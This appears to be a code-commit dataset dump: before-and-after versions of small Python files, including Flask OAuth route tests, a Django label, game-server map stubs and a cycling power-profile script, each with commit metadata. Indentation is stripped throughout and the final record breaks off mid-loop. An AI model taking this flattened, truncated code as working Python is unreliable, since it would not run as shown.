__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Not inform about warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
76abc1d6043a509418027c618d16c5a38502f2f2
|
findaconf/tests/test_site_routes.py
|
findaconf/tests/test_site_routes.py
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if is there a link to login in the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if are links to oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
assert 'href="/login/{}'.format(provider) in resp.data
# test if is there a link to login in the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
def test_login_providers(self):
# test if links to the ouauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
resp = self.app.get('/login/{}'.format(provider))
assert resp.status_code == 200
# test if unauthorized provider returns 404
resp = self.app.get('/login/anything_else')
assert resp.status_code == 404
|
Add tests for login oauth links
|
Add tests for login oauth links
|
Python
|
mit
|
cuducos/findaconf,cuducos/findaconf,koorukuroo/findaconf,koorukuroo/findaconf,koorukuroo/findaconf,cuducos/findaconf
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if is there a link to login in the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.dataAdd tests for login oauth links
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if are links to oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
assert 'href="/login/{}'.format(provider) in resp.data
# test if is there a link to login in the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
def test_login_providers(self):
# test if links to the ouauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
resp = self.app.get('/login/{}'.format(provider))
assert resp.status_code == 200
# test if unauthorized provider returns 404
resp = self.app.get('/login/anything_else')
assert resp.status_code == 404
|
<commit_before># coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if is there a link to login in the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data<commit_msg>Add tests for login oauth links<commit_after>
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if are links to oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
assert 'href="/login/{}'.format(provider) in resp.data
# test if is there a link to login in the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
def test_login_providers(self):
# test if links to the ouauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
resp = self.app.get('/login/{}'.format(provider))
assert resp.status_code == 200
# test if unauthorized provider returns 404
resp = self.app.get('/login/anything_else')
assert resp.status_code == 404
|
# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if is there a link to login in the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.dataAdd tests for login oauth links# coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if are links to oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
assert 'href="/login/{}'.format(provider) in resp.data
# test if is there a link to login in the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
def test_login_providers(self):
# test if links to the ouauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
resp = self.app.get('/login/{}'.format(provider))
assert resp.status_code == 200
# test if unauthorized provider returns 404
resp = self.app.get('/login/anything_else')
assert resp.status_code == 404
|
<commit_before># coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if is there a link to login in the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data<commit_msg>Add tests for login oauth links<commit_after># coding: utf-8
from findaconf import app, db
from findaconf.tests.config import set_app, unset_app
from unittest import TestCase
class TestSiteRoutes(TestCase):
def setUp(self):
self.app = set_app(app, db)
def tearDown(self):
unset_app(db)
# test routes from blueprint/site.py
def test_index(self):
resp = self.app.get('/')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_find(self):
resp = self.app.get('/find', data={'query': 'sociology',
'month': 'February',
'year': 2015,
'region': 'Europe',
'location': 'University of Essex'})
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
def test_login(self):
# test if login page exists
resp = self.app.get('/login')
assert resp.status_code == 200
assert resp.mimetype == 'text/html'
# test if are links to oauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
assert 'href="/login/{}'.format(provider) in resp.data
# test if is there a link to login in the home page
resp = self.app.get('/')
assert 'href="/login"' in resp.data
def test_login_providers(self):
# test if links to the ouauth/oauth2 providers
providers = app.config['OAUTH_CREDENTIALS'].keys()
for provider in providers:
resp = self.app.get('/login/{}'.format(provider))
assert resp.status_code == 200
# test if unauthorized provider returns 404
resp = self.app.get('/login/anything_else')
assert resp.status_code == 404
|
0663793adc99b83d76578f5266e07e2ecbb4bd71
|
test/run_tests.py
|
test/run_tests.py
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=2, buffer=True).run(SUITE)
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=1, buffer=True).run(SUITE)
|
Make run_test output less verbose
|
Make run_test output less verbose
|
Python
|
mit
|
blairck/chess_notation
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=2, buffer=True).run(SUITE)
Make run_test output less verbose
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=1, buffer=True).run(SUITE)
|
<commit_before>"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=2, buffer=True).run(SUITE)
<commit_msg>Make run_test output less verbose<commit_after>
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=1, buffer=True).run(SUITE)
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=2, buffer=True).run(SUITE)
Make run_test output less verbose"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=1, buffer=True).run(SUITE)
|
<commit_before>"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=2, buffer=True).run(SUITE)
<commit_msg>Make run_test output less verbose<commit_after>"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=1, buffer=True).run(SUITE)
|
2080c35b6708718a4014fcbb23e1de3c82d42245
|
opps/core/__init__.py
|
opps/core/__init__.py
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Core')
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Opps')
|
Change trans app label core models to CMS name
|
Change trans app label core models to CMS name
|
Python
|
mit
|
opps/opps,opps/opps,williamroot/opps,jeanmask/opps,opps/opps,YACOWS/opps,jeanmask/opps,jeanmask/opps,williamroot/opps,YACOWS/opps,jeanmask/opps,YACOWS/opps,williamroot/opps,YACOWS/opps,williamroot/opps,opps/opps
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Core')
Change trans app label core models to CMS name
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Opps')
|
<commit_before># -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Core')
<commit_msg>Change trans app label core models to CMS name<commit_after>
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Opps')
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Core')
Change trans app label core models to CMS name# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Opps')
|
<commit_before># -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Core')
<commit_msg>Change trans app label core models to CMS name<commit_after># -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Opps')
|
3e2746de9aae541880fe4cf643520a2577a3a0d5
|
tof_server/views.py
|
tof_server/views.py
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
try:
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
except Exception as er_msg:
return make_response(jsonify({
'error' : str(er_msg)
}), 500)
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
@app.route('/maps', methods=['POST'])
def upload_new_map():
"""Method for uploading new map"""
return jsonify({
'code' : 'dummy'
})
@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
"""Method for downloading a map"""
return jsonify({
'code' : map_code,
'data' : 'dummy'
})
|
Add stub methods for map handling
|
Add stub methods for map handling
|
Python
|
mit
|
P1X-in/Tanks-of-Freedom-Server
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
try:
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
except Exception as er_msg:
return make_response(jsonify({
'error' : str(er_msg)
}), 500)
Add stub methods for map handling
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
@app.route('/maps', methods=['POST'])
def upload_new_map():
"""Method for uploading new map"""
return jsonify({
'code' : 'dummy'
})
@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
"""Method for downloading a map"""
return jsonify({
'code' : map_code,
'data' : 'dummy'
})
|
<commit_before>"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
try:
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
except Exception as er_msg:
return make_response(jsonify({
'error' : str(er_msg)
}), 500)
<commit_msg>Add stub methods for map handling<commit_after>
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
@app.route('/maps', methods=['POST'])
def upload_new_map():
"""Method for uploading new map"""
return jsonify({
'code' : 'dummy'
})
@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
"""Method for downloading a map"""
return jsonify({
'code' : map_code,
'data' : 'dummy'
})
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
try:
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
except Exception as er_msg:
return make_response(jsonify({
'error' : str(er_msg)
}), 500)
Add stub methods for map handling"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
@app.route('/maps', methods=['POST'])
def upload_new_map():
"""Method for uploading new map"""
return jsonify({
'code' : 'dummy'
})
@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
"""Method for downloading a map"""
return jsonify({
'code' : map_code,
'data' : 'dummy'
})
|
<commit_before>"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
try:
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
except Exception as er_msg:
return make_response(jsonify({
'error' : str(er_msg)
}), 500)
<commit_msg>Add stub methods for map handling<commit_after>"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
@app.route('/maps', methods=['POST'])
def upload_new_map():
"""Method for uploading new map"""
return jsonify({
'code' : 'dummy'
})
@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
"""Method for downloading a map"""
return jsonify({
'code' : map_code,
'data' : 'dummy'
})
|
757f984f37d6b3f989c7d9109a09834c2834197f
|
pipeline/compute_rpp/compute_rpp.py
|
pipeline/compute_rpp/compute_rpp.py
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.power_profile import Rpp
# The first input argument corresponding to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.restoration import denoise
from skcycling.power_profile import Rpp
# The first input argument corresponding to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Reject the outliers using thresholding method
power_ride = denoise.outliers_rejection(power_ride)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
Update the pipeline to take into account the outlier rejection method to compute the RPP
|
Update the pipeline to take into account the outlier rejection method to compute the RPP
|
Python
|
mit
|
clemaitre58/power-profile,clemaitre58/power-profile,glemaitre/power-profile,glemaitre/power-profile
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.power_profile import Rpp
# The first input argument corresponding to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
Update the pipeline to take into account the outlier rejection method to compute the RPP
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.restoration import denoise
from skcycling.power_profile import Rpp
# The first input argument corresponding to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Reject the outliers using thresholding method
power_ride = denoise.outliers_rejection(power_ride)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
<commit_before>import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.power_profile import Rpp
# The first input argument corresponding to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
